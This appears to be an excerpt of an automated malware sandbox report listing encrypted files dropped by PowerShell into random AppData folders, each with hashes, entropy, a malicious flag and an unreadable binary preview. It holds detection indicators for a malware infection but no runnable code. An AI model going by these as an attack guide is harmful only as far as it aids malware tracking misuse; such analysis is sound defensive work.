SHA-512:	ABE93C218C88B117B0A0A20FB1D82C246D4798896D854D0A12548B89E2CF40CC07F77AFA10539FDEE4677177F8944D346435D72F427722885B36B044B3FB1C40
Malicious:	false
Reputation:	unknown
Preview:	KG.}..=..H..7............o...f.........g.Ayy7.C.....V.2.<.H.:;.=..Z.D.%.d...]6,......'.#.(....;z..Y..zU....s+c....2! ..&.k....]BZ`~..}V_,..nj........o.....0......G.....b}..E.[-.....D..l.Z..i.U....n2...I....X.MU...C.;R......a....Q.#.N.....k.(......\|....C.QC&....\.2$.. .m/8.<,......Z.....Kz....`..2.@$.....g.^........h....u..P.<..W...D...4.3r.%.^J..!._.>.]9.v...Fv.....3...O.}.9Na....h..-Yo.....v...j+T.].E..=?y.N.T8..Y<....p..]Tl..I....V..^f.6..!p..A-g^".....a..U...,Ek....xvw....:..We.mB.._.Nu.k..B]C.]>.R.SZ...t./,...V....!......fEF..$..Z.w...d>...YC....H.#.I.G..3.~..6.,..Z...-.O#y.......[...zX..!t]..o7.JD\|.E..{$p;@...U.......t......[;..5.).{n..Z..ob"..k1.e.n>..M........,.qa.J..W...)..V".{!s-.F.L....Y..N.=.y.C.}....c.d-}.^..C.?3.:..".\j]...7p.t..m....EV..{h.9.>v..gr....o.*&...@..J...9x?....o.....,?..Mp+.7.(<gpC..Z..NN...e.-..A...gp......A.p....23.F.......U.[k..t..%Q= .E.PCQ]`w.b..Na.x....ql........CK..\9.....].X.6Y.?,1c..y.......6..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\zHeFtVYqBpg.NKAZVJTHWRvGLsog Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	199151
Entropy (8bit):	7.999079666244119
Encrypted:	true
SSDEEP:	3072:eHIW3332Db6B4IIpvHQOISNIV/Uw1KfRmOmOtOdTtHiRUi/elPDuvwr5bTSkWgqq:yT3HW6uVon8w1KZiRJQ/el7uasgq03
MD5:	EB8ED33AB89A2FA3334AFA2338C9A1AF
SHA1:	BACCC537C01D5405F47974F4BD361604EBF63B4A
SHA-256:	986ADBA396379EAA28DAE142D7DE9AE8DDB36EE98CEED3475C21E784E6EFB2BB
SHA-512:	FEED894005F61BEFCD4CF427E246176E0842C3E4D95F1B46CCA8845B27802DCD7A3CD561474CD0879A594847C639FFFD2E51A590ABAA1F9B3A7E30E5EA754596
Malicious:	false
Reputation:	unknown
Preview:	K..3B...../.....l.....X22@.ii...L.r....9..k..Z.M$.YZ.. ....e...'S........\|3...".32E..\|..x.Y2!.Ch...6H..L....>.1.M.w..- :&...J..a3.'2..[..q...v..'\.&...."......X...Qt}..NCO..6..>..K..R..c\.S.[l1W(...N..4..r.g..L...X..w.!...X.C..ck.BF\.n.Qgn.....a..s\|...-.9C..$..s...bfu....,(..k...k....x.5r.8Ik;Rx3.Ir........E.'.,.......@...Y...\|8.L.ma.......p..N{...._..-".?.@.DK..^."s.,.P.6;rp(...._w....z%.,Uw...z..3.m...h.]..s^.....r.<i.T...S.et@..AG....a;v.......5...B&X.......2.1........z..@66.v?[.:. q.....g.RR.dC.[FM.S.. c..........T>.!07....Y.@f..t..t...Q....n\....u.+O....vh....o;.#..U:k`.ye(.<.R.nYHk........... ..N. ....A_.+.s.{i&.H..:Q.W..y)p5[..M.}...5....2..Q.`.O./...T.6t..p.-..Q...,.......P...G/h.~..f.a...%Y..;....#...._...T@.(c...k.&..C...F.....&T...p.../{l.v..?...}.-X..-;.)..4.}.W>.Z.{.O.Dj.PT...:x&..<C.._.8..(..0n9.2........N...T.j.O.7..Eqt.S.Q.F..$..7.....{.....R7_a'FQ)...NW....0..N.N....\|...5..E.0J.j...*w.7.6\.\|..f...../^...q..3..?.#8S.F..).o

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\zRavsAMIod.XEeGAaZSjKJLgPsYnf Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	179208
Entropy (8bit):	7.999011516370358
Encrypted:	true
SSDEEP:	3072:lfVAqPS5a1ygTRn+7Aeg2bOXGMB6chmjBhgyFu+q03Ujy/bYPJ7PmhWKseLVMg:d765KygTRn+7fhbOWMB6cqI+13Qy/8RA
MD5:	13B116D84E58109B4EEA8052A4057FED
SHA1:	7D8FB243A0FEFE7C86F26344DE0928B6FFB53569
SHA-256:	F1ECD7E1C0EB64ED79729E5472914347A52045CA73B0BA83064D9D7D595BD173
SHA-512:	9599538F17675C526D15FE4E71A5E3B11F1378A13D7179D7A78B6BBBE42DE6C65EF1D9EF948870C6729CC409CDB8F4D5E7BCA48C8601962F5934FB43E2D5FA40
Malicious:	true
Reputation:	unknown
Preview:	.!33[.....BJ.....00CD&..'.T.H[h.........8z....w.`j..e....4L...(....U.n^...x.-.~.\a2Q..}..uK8....x.>u.'..........dw..sm&....."....E..5.+~]4..WG.$"a................y.KKq>........QBk.z..(+8\|.l...=0..MbO.aS..(......Cx.lo......j.A.r............>x5F.. W9.k..{.2..uV&...U.Q@.7a.....~Q2.t#4..w.)..M.d"....6\...........!...C.S...r.,.......j)._>..I...2.2...\.....$).....P..xO^...<....@<...H'ec..2.5]...".>\V.....y...]....)!rx.,s.>( ......b.Xf...NDL...._...'pmA..YB.Y.....F7.h.....a....0+k....?..6..u.oF.i..Z..aS..>..rXG..i.......1......{l....._.8..7dx..9D..;..htp...t...(..t..I...m.{(#..E....20?n..tq.[.O&S.A..T....H.../.>...D.q..r.ve...e../.aF...E&1..B%...V..}Z...@.A.o.`.+.3.H.e.~Ka..CQH\.......`d.{G<..[.....y.l....:..O..Y..$..(3...tA..k.-._[..&..k%`.+N.]..q.....O.{.....P..J.....5.&.6..`.........J.Wj...@...aT....Y.(.D...d...;..Q.9..:.qp....gq...0.b...e..G....................b...#]...QCS....^d.....-.#Wii?:TV.+..Cp1..........7Hl.'....obK...vba}XQ..T..BDG

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\zjpdqTwBeoMJyCXsWAV.BrPiUdlLcqpuY Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	132975
Entropy (8bit):	7.9986028256474295
Encrypted:	true
SSDEEP:	3072:DCN2VyQhrcq18N34MIkyzS6IlDd94jnDNpWn62gby9I:WN2IJqiLGIZYxpWn62ch
MD5:	40239BA4611C59E949BAD234F5303BEF
SHA1:	EA79FD5F5D1FCEB5359AA3A13EBFD6B9A3B1F57E
SHA-256:	FD5EC4B811D794EDB7AD972AE1CA872C475596B39D6B457D15034BD98C4272BF
SHA-512:	421F827D90544213409E6FA4159C20B18DAAA5FF5FC7401C36BED0546DEB03E4D5BBEE08C79CD9B26750999EF296E28BFEAC80ADF8A3F915960AA3E88FF21F48
Malicious:	true
Reputation:	unknown
Preview:	>..1W\|..e&.'.......0.f2.\|j........EU^....:.....U\.....t.z..,.S#h..z.1..A......\|.....h.:.%.....u.A.... .s0...g.?..z\....G?...3.3sf...e...7...0.~.0..:...`ng.?5...........S...!.Z.....[?...q.M%K(.W.d.Q.b.............\|UuE..K...=.....D..3..a.S...H$?....F8......I..A.K.j......d'......X.0...8........g...W....G..H....Z......1.yT..L...3..C..+%p@Uf..../J2Q..0.x.-.D..-....5W....N....8...R..........E'...z.5..Y.x..N......q.s..x..~>x!.....z...0-J...U..LM.Im..J.....m......~...@.(o...W..+q.T..`?.U.I..). ...2,2..:-.I{...x..a.]._.... X.6.$..Q'...S%...DsyT..#.41..A`..r.Nq.V9g:P.E.E7.O.lc.....j.~._...D.d.9..`0....n.c...:.^.f..k...d..y.2Q.G.5%.p5...&#;.=?.iM^..P......2_J...)oe_....f.(.r....TR...vi..Z..I.O.^!......Ka..^>..F...DT...P.....P\K..D.F>...M..Y@0..uQ..2.....Jf.H..."...Z.I..5.._oR3^..A.m....h....f.Y......Xj.@...N.x.^+.:...G."..A..nCl..lA.l.\|.TC.qQ.....K..h...@2p.S.5w..................k.T[{M+....cs<...D5.D....;.W.....f..ny.q....t.....&...O?..=.4rf

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ABIsmoHiRLGZfKpt.saIBcKtnCZfHhqyomGT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	189978
Entropy (8bit):	7.998987487138846
Encrypted:	true
SSDEEP:	3072:6Ul6X/uWE5VnyjTxPkgK52NbM/No/WMWDC0QXPnYS1nFbk6dm2D4trzlQDZ+Zjx:6Ul6XM5pyjTZkhstmo/WQ0qnLk642D5E
MD5:	B9EF3141AC7ED573372E20A63F94B5EE
SHA1:	7EAAB55D1B5C04003E6BD9522A6D438F429980E6
SHA-256:	390A469B799FB5EC5760CF9AF4860FAD122C6C5A096386AE6AF37A41CA07EA66
SHA-512:	2357C76D470A40CBDB7E374DA63693E4821FD17D4CA4EF92758D67F76F15B8167F0E58A416ACDBC6E0B5CE01DB0884C510C5CD4A2FA5F4BC425B0499320CEF4A
Malicious:	true
Reputation:	unknown
Preview:	\5......r%......M....1D./.a.?^B.6\|.h8G.XB..^.......&.3....v.~&l..d=.....@..G.U...d.Q.....u....C.{.!Q....z.m..m....[...`....5.g..qjE...^nJ.-....../Z...E......M.BK.'En.c.w$...[.2.7M.\.....Q.x......Y........L.\|...w...'~.....+..(.F.t..V.."X....g.X.X..@.>....e....lM+.k!./....s.&.."..u5.p.".l..B2..i^78....'rQv..X.e........b..A.yi.k..w....w.+s\|...B.c..4......0..(e...KQ.2..`..\..tD....g..........B...fFq.T.ZU...;"u.$..GcOA......M[.~....k.wI.&s........0.......%8.b..........=.JHf..X.M$Go....y..~......1.9..e'mCj.Z.......(.1}..f..^...'...9..G.<..S....:P..h.1C.....S.`...7....Vv....#.P ..X..O..;1.=...^.....c.....>...^...4=.B#\..l...V.}..V[..)4.v.I);...!..{[m.5X..'...j{1YEq..u.O..yC....4.ugu..9;O.$.-..z.Nv..m..~...<.....p..p.%.+&..&.....haD.$V..B<..M.Ai.^ml.a. ....`...S.>.L_.0..?........t......F~..w.....U...<.wQo..\|2H.......c...v.r".w.......P..a@.....h.6.-.w......./....P..l.;=.".\..k....`.j.....1...%7.X.-..fM.....+.*.#.?....u...X.Rw.pK..m$.....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\AYZutSJyoh.NfrEmbKigQsDGMYBqF Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	58144
Entropy (8bit):	7.996459480584297
Encrypted:	true
SSDEEP:	1536:vgoofLwv+rtgbDnalmtvTVMVQ0+3Z3i9L1GmE:4ZM256Ft7VhI9RGmE
MD5:	14D12D595198992AD764F01513E80606
SHA1:	75E62EC02603E69B2E72D2948EF52D6F24478355
SHA-256:	CF5755CDB85B0E38D793F6DF1B06FDC7E6A494D7EA500CB596B8C560C349A7A9
SHA-512:	D93DD256119037B41FF5722D130716CD3488D9880E51FA4474F5A02CC8A9C6284A887609FAF6FDDC3103B498834215D6C4929E49DF5ABB0C8CF96123746BF7DE
Malicious:	true
Reputation:	unknown
Preview:	.X{.."....w.3....#......E..8..-..V...r.........."...r.I.....F<^..>..U .o5.{.9.....KL.BzW.....i\|.).}.2..J~=....S.W...b..D.......i.9..`...+.....AwA.......T%!..q..M.H..".t`......I...}..)...?.\|O........J.:/eL...E..X..d...:....@b...PzI.B...g..t..o:.T.;...D7T.(..........<.V.ST.'..+.z9......j......i..s.\|..W...<..*5Wq....B.......6.)..W :..I.;....O.....sIV......2.P.BQ.....Fs.n.E..H.....K.._!..w..&.....y}......<.o..=#.......$..G....D.w..CK..#M.T....7..-2....I(.....D6.l.......L...DnD.V.....B..x.>.g.......'y2.)..f\(...2p..z.a@.o.h7.R..... .f"r<.duf.wU2.IH.9,d.....H+g...#X6%$..b......7.h_g...9.l.,:j.y.)n.....j.+(.......:u..~._....(+.$..RF..J.Q.y..t.y..k.......\z.`.E..:...7......,..o.?.{.bs..`.+y..^Q.P.4.j.s..).0...@....`W...9..A....a......v...~.99.B.3V...0..`..3U..Q.{..t.E.B.$.Q\|I...h......)..i~A.I=..mO..pv....S8.u.~..sT..&(.<...2.A...L.h..E.".X..!j...Ej..`.9..A.G..W.1.:q...]Z..3.]'.O.\|.I.....1.M.a..8.mK.[.r..x.0..I..K.F.i......n+..$...i ....X.\|...e..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\AgVzxdZkmRMrYFU.AMkUKcGvTE Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	129561
Entropy (8bit):	7.998653060744865
Encrypted:	true
SSDEEP:	3072:P+SVk2i0sAs1rTGHu7Ou5QwyyXuGth3Rk8qmqxHZCKJyI1VL:P+R0RAOu9XuGtBRzBmvL
MD5:	BBEFFBDE17A4A17EA625C7B316D316C9
SHA1:	28C05216DE514EC94E586C271CD0830AD3CA8043
SHA-256:	A667BDD68D91F19627E71E08E033C9B388003D528A6F3B414EF8EC88DB60BBAC
SHA-512:	EC3C237CC6C9975919D0BE2AA61E727F9DB5210B1259B449AB36F413F40B7A3C1B6745D67E0829338A7A3602F799678A40029A37D89803650601CFA151E8A658
Malicious:	true
Reputation:	unknown
Preview:	.?p..9.w...i.....y`84..(..'O.......kH}...9Pz........<A..f.q.......=.h....&b.+..-}:0.L..O...8.j.4e.A.... .l..i..D-i\|9....B~.......i.X.{..p.m!.......Q......R.[....P...$xM..}.$.r...)p...qP.(.qi[.".5.$.O\.;..Wj..>.z.D..k.$.v.PY..U..(..g..z.y`...O.;D....B.'...xq..a..z._....."..........8..8i\|.-.......^.E.<.g..?....`>/.x..^.......[.Y-\|..cG...I\@.../V.o.........7.g3.........P.FqL.q.>.`........k.[.y.A.w."J.>.L.[/.....,..m.;.......z..g....Kw..h7...x..f....<.a./Y.a..^......CX...>.@....p....Gc..-$}Jle#..z.).8.{..^..[u......J.....hV.....h.g?.X..)..2.7s.~.].b.........C.....\.i.$....%.U..".+.>:.?<.a..X.....y._.....hq....!...d.&..!....O?....+)i'...3.16...v.R...o.%1.~!...._...;K.E.....i..}.o>.)L*3.8rX....x.C..:.SK...6g..z..7..5..7...R.a.E..2....N.N...p....U.Y...R...^J. B"5]H.)...5A.....M......L2..%.BD..y:,.........g..P...H6F.....e.."g.xgkK.b.@..%.b.FTusB......P....D.....a.PRTdw._A..By.r=.oX7..a....!w...n.GD..9.gu..Dd=..%+........ym.gq......

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\BIWiHudEqJMsDyPngz.rMfODTVEPdJokwQA Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	125696
Entropy (8bit):	7.998543007192815
Encrypted:	true
SSDEEP:	3072:JKBe0rfFdBQFjcNtbwZojScLz8h4fVK6FdVGn49bVd:JWjrfFT2ojSwvdVGnSP
MD5:	9CBCD8CDDD27284D54F828A9DEAA4A1F
SHA1:	77A411461FFA413AA8C5E8A2701E1F6E776F3BE5
SHA-256:	96641F0313E491936C61C5747C843765832FA852BB8B531BFF913208A3C1AEF6
SHA-512:	AAC265A08DD4C2A6CF54CB90D7A64DB189D517600B1F4D34EA6A7CE2FAE3BDCC293C7ED50291EE5EFF431ACBF480B42AE8379103A048E13751F671D10BCB4F34
Malicious:	true
Reputation:	unknown
Preview:	.W......J......c........:.E...l..s.Ei.7......0.h......=X#..%U4.ro.rX.C.e..!0.S....G...'5.!P"......q.]MH...6....@.?y....J".".B.,...AfK..A..1._(\|P...,.....s:a%.P..B..4..j..U1..o......t...N-.s.3..4..4m.A...5o.@.S{....d...\h.N.1!....e3.....WO.;.....p... ...7....zjC.{JK._sW..Z...2..]..(E#.;...n......@.qV.b.X..dd..]....X2..S].:y....0..g.. .9'..^.7.$j.+./....'..Q.......D..8s....}B........gn...x....e...%.-XmoL..G....2OVR..2.D.&.......{.bF..!..OX"a..0p.r.R.Q.hF....j(.f....@...!Q......E.;.^.>z..@....0..O&C`..U.......7...v..cr2ub...k......kM.=~BI[.kDC..C...]m'..?.`...)8T&..+.\z.'x1.@....&A.?j.....i...>1g../m.. .......g}....}......Qd.yf.[..:x......@f..'..[M.5........B;..1..l.ubY.F...;...[h..._...T...........{j.G..... ....%0gy( .`.j....Q....k.......&........O.z....X...Fd_f.nv..x`'\|\|./w..i..#q.S.z.;..C..{]...>.u...[..e.fS..@......X.v.....'N..FT7......r\;o._.A..7......y.k)k35lP]..&....@.b.K'.p....yn.\.6..)..../6..R.}....C@.}b...*.2..-...`PH...$..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\BOkHbjCXlPxTtW.IDJSCGETVFmUXYsbWd Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	61202
Entropy (8bit):	7.996652164290208
Encrypted:	true
SSDEEP:	1536:Jk4HwmA0OXmy5CUnnGHmzSEAhKgZuOzwqZBJDwMb:xhyJ5CUnGGWE/Wppd
MD5:	5D8DC94E90B57EEED6F6F44D59261CD2
SHA1:	E27B5B3E2AA1D77E416EB1E5BB4F71B3C302ED57
SHA-256:	B3515EC018574FD30FB475D031518AA4F57A42DE7507B340216CCD7BA80D96FA
SHA-512:	D504490EB26ED03C50C80A5FFCD97DF9CF2866F68817419AB71BCAB66849995B4AD2D287534579FD5EC218242F6B6042D14FC3F1D261D6BA241922FA1EEADB20
Malicious:	true
Reputation:	unknown
Preview:	..!.~...;........]..e}....l..M..._$...q+b...Io..^..!h[W0..f......oV..<'.RU...A.o..=8.jP....[w...$Ui.d..},..eB..h..(.{.u.N.tj.\|....q..D .i..TI..)...dv.....\h..Y>{w}.kE.K'..!..Jc.:ds"...i.......&9......N.j....... ...U..N.n.&..&..MQ.K$:...:.m.0..1....8."L'/P.A..s..9v.....<.t]+.9J.h..C....../f.O.B..e.9.........a.@..tn.....l.$c.......5.....c..%Q...;.v.S."z......}...m?Q-....F..W...n..s]...M...p?....]].n.W.IZ.4.&...6....V....7...p.....Nmd..B\|KN.r.x.....#...x...s.{im........~...%.:vj...}..f......:z.@Y.R.-..y^.Q9d&P..6...F#.8..p...$5..1.si.{..<......Hm.a...O....;./.......W>6-../X.k.....D.....qB._.....L@.N..\.. .AZ&.8h.e..D.4..X......9..*.J;.../.@H.hr.r...0../.o3m;...K..."....ULG..Ut.RG.......7Z..\|'#.@..z.0..'&...76....<zD.gi2.`....jt}....2.b.A.a.e..#.D.e..].. Y\@..k..0..O]u...I.hR....f..0P..m.w.d.....6..M&...f.t}.'....dK...%....&..........C....=....f..:../..&.d. }-JK.....H.... ..Q..~.Q.......8,.f..Xp.=...>......<5P..m....'...U.8.\.z..d.\|...eW

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\BqcKXRDrZxbzksaJF.hNioXuZeYA Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	188189
Entropy (8bit):	7.999083924641047
Encrypted:	true
SSDEEP:	3072:enJ0x5OXpKtM3qGVdQbq5yP8nzOyKMZlnn8mWxH3LtvVNrWEw66kdNwQK/K6vQo8:Q00pKtAlyEnqyFlU3LtNhWEwYHKhQo8
MD5:	579B04C8D14184B0F0422F69C880D56B
SHA1:	247D16A6681C7B0F3FE205430B108EB84FF46138
SHA-256:	06332A09F1D83C9A70758094D2B7C256112E91D577BC4D1640E3E3BD926D1C3A
SHA-512:	65CDE498EC65F1533CDF77E12570F1CA5903FD64ED856B1CBC41FA5602D4F91CE2C7C50A3B686F3636828C35AF96A0F7641286314C33A7F55CC5CA385F376492
Malicious:	true
Reputation:	unknown
Preview:	.6..?...\.c$...ID......D.3Q^i?=..M...3..R.yt..R..e.D.t.A...6.`o&g..."R...Go.........x@..`..@...R.>.n.XS yd..7+.;7`....}...UjX2.}F..z..f.d...n)...aOP....a.....G.a.h...`:.=.._..RS.G-8.....$c....L..hFC....r, .AC..tu.Z(w...<.q.:..R.....X.9.w.....'@...3.q...@.....Ud.d_-C..K...[.jz...m.u.s....N....\|..\..PYx..VO"V..H.....N.nB.._F.q....xj.!..O..m..e>...@.0../...4...U.0...<7.:.....b...9.S.X.U...5....W.X..X.5....]..D.H{T.m?b..... ..,9[.1f.."...M.n..vBrt0.....L..-.1.Fy;...;K...B.z.S.b...C2.hg3..Vv.+(w.`,.8.....43..y..G....s..X&.Ri.I5.~#.yQ.ga.e....n%0q....4.1u`/..o....B...F>.L...c-8S......G.8.3.......b..9...5...R\.P..A.<..M.\wV\|.8.K..\|N..y.;.l...`..e)...+b...0h.=..n.b....s....\|..vwe....Q..tj....Pk.7..h.....C..a.x{...0X...sCP.V7?....4.U._v...W'..J...T..$..S..........FHI...............7..N..G[..Ka..m.[Ns...&..7&.x.=ihA...Gdu._.....7X"...P.. vG."............Wb?.c4.A..`.l...\|D..E...u<..qP...OQ.x(.B..n.D..e....?..{,&:..b.e....dS...l=.,1"P...H....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\BwfYvVCqAGOkJSgT.hxvQyPIopOKCmgNRFW Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	183953
Entropy (8bit):	7.999003152743787
Encrypted:	true
SSDEEP:	3072:fj1LoVs0TETFqE/XMgC44DN5sm9/n3NiVCPelWT3cmpj906X0cE5RX9aN9DDjCcg:f9oVTa/vBEv9PelWTsmkG0cmaNFnzobj
MD5:	28DEFF47A9142E2410C082EA76E466C9
SHA1:	A10E942CC17D5822E54100AC2B8B846FA2C5740A
SHA-256:	0D3299A81BBA3010E2FB9307D2D3342F9D5A657119666A1AF5C37E097C81224B
SHA-512:	C0F48437F2DB53CD0A3C76CF711F4943C9944D12ECEDDF4B9A7FB5766C809D7BA84CBEDB594DFC4965A1FFEC665901D919624A9CAAFDEB93656FC1B94709E70B
Malicious:	true
Reputation:	unknown
Preview:	a.......Hk-....1@...._$.t*..s..g`.w.8....&...Orh8...(}...2.n.?...oB$Q..R...9........>.D....-..N.M..wm.Fqv..{..'n..@0`.e...S.s.yDg.j..\|p..p.....))]e..m..u.sR.k...5L.V.?>8..}Fv.[-I...I ..4....rb\.w..%..&.[3..=.$..o...P.!....\|. .....u@..bb....Ev.....ZZ.!`vT@....)g.?Hp?g..).vw:...3.R.U....B."......e~.}.E.0(..<C...;...n{)..X....l[+.AD.R...}.t.....O^....g...E.(=...@.)..g.........-.>....t..r6%.4`..f....!..._VY.x/........l..n~..X..cJP9...,.B..]9..p.R_.hL=3...2....OI..zL3...OS.tw...........i..T...'...zU.u\|.>.....!O0.t..{..!..F.P.+../.."..+>.....[.)....Ts.KH.juq..H .6Q{.PN..S@ZB....E...3"9.@..o...~.%0...yOL ....uco.28.u.....z\`.m.....T........;.^.7..jr{........e;:@k...:..G....{..P)..LQ...O......U.......q.+...?vH..km.......v.r1...b..r\.&..8.5.-81.....P.S..X._!.@....k..,..YWTH[@Jeu0..z..qZ,..@.4O.8.MA..T...kk.N.......~..X..........s.4n.&..W.]..1.vFc........*Lr#E..J..N..PR_!.XZ.RN.rKjH.aW...9.#.v.F....T....',.s....1.7.^rJ.E.&......7.....#9+...h.(\w...?.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\CuDtWSPxRf.RMalNjmdhTpzrFgIxSc Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	159554
Entropy (8bit):	7.998902745644188
Encrypted:	true
SSDEEP:	3072:ZUhtSPEB+SOZfj7ZH8Y5U/vaMHNCmv3i3qBaoKmFVBuc:ItSPbZjJ5U3Hsoi3s7FTz
MD5:	002096935BF909A87CDA48E928067FF4
SHA1:	8CC636041E569092572334D602E27AA23A7BFB14
SHA-256:	B0D8B5FF589EF6B2D703D2BFF4D31DDC158ADC5656FDDE8F1D51A2F875D69F7E
SHA-512:	5AAF465322EA72D35C21992DCE6F1FD46A2885983476EB552422EBE1664A33C236F0F736FDD1E75BE4DFE8B9F87F4DABF4716857C0AA95967D36FF5DBFCA2B18
Malicious:	true
Reputation:	unknown
Preview:	..a;.m.%q...W.?..V ...r.Z.@7.X.1......Z...W.(G]_b".F.K.b.k-.T..l..}..2.....s..0....DHk..r..j.b=F.D...IgJd.ES1..:L.[.(.4`.g&....^,..r..dVN.t&...>.....'......A=F...p..M.@..GE....Y...\|..D.~.........v@..0{.WLD\|.<bZ.G.y............m-.k..:.l....-Q..Y....V....#"X.u..N.S..s9..5.\.jV~.a+u....^wr....8.\|.o...8...@.8.....(?.[.../.$.?..R.a<...\.>...s.I(.W0.q...G.......6@K.Y.-1.....4..d....+_.Gs.?.F..2X........._..A..9/]_ -..Sw.w!.0...!.i..2Kj....1...Z.8...p...h.-.A.#...x.,..B..nx..n....!...-\.`.f....?.c..^="/.e.W.{.v_.ng..,.&.........@.c{...,?1Ib.IE!Y..].p......!..?Fy;...:.\......_V.~..;.....9...W..a.p.v.0.1..C3.4/5.[:.>l.._Qg.....nR..=....xDP..U....#......).....r.HX..f.4Y=F.Ia..F.. J.,Y%+..q`u..#.\|.Li..G\|=.7h..j[.k'1....[X...J.=tG(ZVy[h........Ym..}...N,N....2.B.....l.c..v$....EK...H+...._ox.....g.)..:8T..K.k.>..pU..qO. @..O. .."./QX.S%..(.1..P.....{.J6.....qJC....e.arw.\|'r...S.z....?.B...N..S...C-...#.)mL5...Z...I.0I..I#W.p..]6...U.W.r..+......M

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\EGidmUOVPrKh.gekSCYTBVFLNbaXmAwt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	142092
Entropy (8bit):	7.9986872946582555
Encrypted:	true
SSDEEP:	3072:grYeCpye1RIgA1SyF5bXTTqfyGGJXETrgJ8KKoO1jQpOqX2:gUIkZA1NPXTTIClJ9KoHD2
MD5:	42E60CD897473C1370F60ACA0C44FDBA
SHA1:	9BEBEFDD3C7445E3CCF50A1B147B07AF6C21DDD9
SHA-256:	26AFB0EF6118933CA061B9248583CAD89DD2E1684C43B1990915F97E10EF3357
SHA-512:	487EF2517F0F7AF545CD6588AC7381A61446A7941CA9FBB69ADDBDDD5C01EDCA2CF255F8AA7F5210D000C22B0A502F4EAB3CF02F02B755A45E4C36C57919D76D
Malicious:	true
Reputation:	unknown
Preview:	j..NV&..-V.......z1.6..n....@..(.FcG.g.g/~...DBl..<_..S.#Z;:]-..^.}.\..&M..p\..BA9f..}.\#<,.......[.>.)93....gd...Ls.k.^8..UD...YP{..'<csj7.\..>......:S.WC.....l.....C.S.....V.+..d..=...~.].....cO.....r&...+..\.L........(=....VJ.....^..A..M....>.x..L..>I.H.U..W..B..^D..a.Y.....H.\.Q.....hC.M....IL#44...B~.+/N..c..!m...IZw.u.....d..O.fg,...x....W.-....u... ;.<iOK.a.1.`.\.W.....a.(.>.Q..~\|<..sP.O.9..99i...N....&{.".....!...p[.L.'......[....a.r.]n7..l..Y.\|...R....sNF.F..B.z..x.....R..&FTy.<..0... ..Pz..W....k=."..eL..xp;..?.^.e..#\|?...3g....O+.........?...H...t...Q.}...z.f.>...t.#.^.......".\5.... Ev.9.....A.o..-..E0..n..n1.....S...%.U....4m.?.#.s.Z[..'H..t.\)..IM_H.\....P0.. q.p..<.Cp..L.k.w.P.....eHR..d.......%#.a....\.."E.........A..m..h...-.....T.}.....TVt..r....tY.5.._..g..JJ.5Nb......^.,....-.d..G.f.1V..<..Ge.G.:.#.....h9..O`.].,7..+..."...^..i._\.:.o)...D..M..J...M.,8..)......X[.m.%..};5....3.{s.......A.i.]M..i\HD'....)..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\FsLNgGzAoERUOYu.FbwEkRGHMxZKCWsgXz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	163900
Entropy (8bit):	7.998923337071439
Encrypted:	true
SSDEEP:	3072:MBBlzCJ9Y+ajRkTjGSd0ZyexvX1jNgRw5pjeDQYJbNaDt6EqjhpEN40Aa8dUO:Mz2YrjR8QFjNWQeDQYqDtB+hSNLAa8d3
MD5:	A475385B2AF068449032C6022DEF68C4
SHA1:	1D8DA02C5CE88FC20C0BD3595FEDDDC90FB9405B
SHA-256:	D766EFBEB80F01C7D1C1C2AC9381C840B46401E4FC4E7774B972A5275A5F3A6F
SHA-512:	240AB3B8DFAD2521528DAE57585A4EAD03C0E69E8696CCBB8A3FD870E802AE0627A129AEEFB234300713CB37A0483A3F8BCF08C01E4D99604367808A9FEFA014
Malicious:	true
Reputation:	unknown
